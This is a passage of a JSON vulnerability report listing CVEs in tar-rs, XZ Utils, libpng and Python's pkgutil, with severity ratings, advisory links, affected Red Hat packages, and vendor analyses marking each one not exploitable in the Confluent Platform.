          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        61
      ],
      "description": "tar-rs is a tar archive reading/writing library for Rust. In versions 0.4.44 and below, when unpacking a tar archive, the tar crate's unpack_dir function uses fs::metadata() to check whether a path that already exists is a directory. Because fs::metadata() follows symbolic links, a crafted tarball containing a symlink entry followed by a directory entry with the same name causes the crate to treat the symlink target as a valid existing directory \u2014 and subsequently apply chmod to it. This allows an attacker to modify the permissions of arbitrary directories outside the extraction root. This issue has been fixed in version 0.4.45.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-33056"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-33056"
        },
        {
          "url": "https://github.com/alexcrichton/tar-rs"
        },
        {
          "url": "https://github.com/alexcrichton/tar-rs/commit/17b1fd84e632071cb8eef9d3709bf347bd266446"
        },
        {
          "url": "https://github.com/alexcrichton/tar-rs/security/advisories/GHSA-j4xf-2g29-59ph"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33056"
        },
        {
          "url": "https://rustsec.org/advisories/RUSTSEC-2026-0067.html"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8138-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8139-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8168-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-33056"
        }
      ],
      "published": "2026-03-20T08:16:11+00:00",
      "updated": "2026-06-17T10:36:52+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.34-11.el9",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/tar@1.34-11.el9?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-34743",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        122
      ],
      "description": "XZ Utils provide a general-purpose data-compression library plus command-line tools. Prior to version 5.8.3, if lzma_index_decoder() was used to decode an Index that contained no Records, the resulting lzma_index was left in a state where where a subsequent lzma_index_append() would allocate too little memory, and a buffer overflow would occur. This issue has been patched in version 5.8.3.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-34743"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/03/31/13"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-34743"
        },
        {
          "url": "https://github.com/tukaani-project/xz/commit/c8c22869e780ff57c96b46939c3d79ff99395f87"
        },
        {
          "url": "https://github.com/tukaani-project/xz/releases/tag/v5.8.3"
        },
        {
          "url": "https://github.com/tukaani-project/xz/security/advisories/GHSA-x872-m794-cxhv"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2026/07/msg00034.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34743"
        },
        {
          "url": "https://tukaani.org/xz/index-append-overflow.html"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8362-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-34743"
        }
      ],
      "published": "2026-04-02T19:21:33+00:00",
      "updated": "2026-07-24T21:10:00+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "5.2.5-8.el9_0",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/xz-libs@5.2.5-8.el9_0?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-34757",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.4,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        416
      ],
      "description": "LIBPNG is a reference library for use in applications that read, create, and manipulate PNG (Portable Network Graphics) raster image files. From 1.0.9 to before 1.6.57, passing a pointer obtained from png_get_PLTE, png_get_tRNS, or png_get_hIST back into the corresponding setter on the same png_struct/png_info pair causes the setter to read from freed memory and copy its contents into the replacement buffer. The setter frees the internal buffer before copying from the caller-supplied pointer, which now dangles. The freed region may contain stale data (producing silently corrupted chunk metadata) or data from subsequent heap allocations (leaking unrelated heap contents into the chunk struct). This vulnerability is fixed in 1.6.57.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-34757"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-34757"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/398cbe3df03f4e11bb031e07f416dfdde3684e8a"
        },
        {
          "url": "https://github.com/pnggroup/libpng/commit/55d20aaa322c9274491cda82c5cd4f99b48c6bcc"
        },
        {
          "url": "https://github.com/pnggroup/libpng/issues/836"
        },
        {
          "url": "https://github.com/pnggroup/libpng/issues/837"
        },
        {
          "url": "https://github.com/pnggroup/libpng/security/advisories/GHSA-6fr7-g8h7-v645"
        },
        {
          "url": "https://lists.debian.org/debian-lts-announce/2026/05/msg00017.html"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34757"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8251-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8639-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-34757"
        }
      ],
      "published": "2026-04-09T15:16:11+00:00",
      "updated": "2026-06-17T10:39:34+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.6.37-15.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2026-3479",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
        }
      ],
      "cwes": [
        22
      ],
      "description": "DISPUTED: The project has clarified that the documentation was incorrect, and that pkgutil.get_data() has the same security model as open(). The documentation has been updated to clarify this point. There is no vulnerability in the function if following the intended security model.\n\npkgutil.get_data() did not validate the resource argument as documented, allowing path traversals.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3479"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3479"
        },
        {
          "url": "https://github.com/python/cpython/commit/5af6ce3e7b643a30a02d22245c1e3f4a8bc0a1fe"
        },
        {
          "url": "https://github.com/python/cpython/commit/bcdf231946b1da8bdfbab4c05539bb0cc964a1c7"
        },
        {
          "url": "https://github.com/python/cpython/commit/cf59bf76470f3d75ad47d80ffb8ce76b64b5e943"
        },
        {
          "url": "https://github.com/python/cpython/commit/d786d59a8f7196bb630100a869f28ad13436b59c"
        },
        {
          "url": "https://github.com/python/cpython/issues/146121"
        },
        {
          "url": "https://github.com/python/cpython/pull/146122"
        },
        {
          "url": "https://mail.python.org/archives/list/security-announce@python.org/thread/WYLLVQOOCKGK73JM7Z7ZSNOJC4N7BAWY/"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3479"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3479"
        }
      ],
      "published": "2026-03-18T19:16:06+00:00",
      "updated": "2026-06-17T10:43:39+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.9.25-7.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e7727869-41af-4394-8d91-6b2282fd2848/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ed7aa31f-d50e-485d-8785-b372e385755b/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c3615eb2-749f-436d-a44e-bcf115907864/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python-unversioned-command@3.9.25-7.el9_8.2?arch=noarch&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3-libs@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:1080078b-bf88-4505-a133-1abe47582404/1#pkg:rpm/redhat/python3@3.9.25-7.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
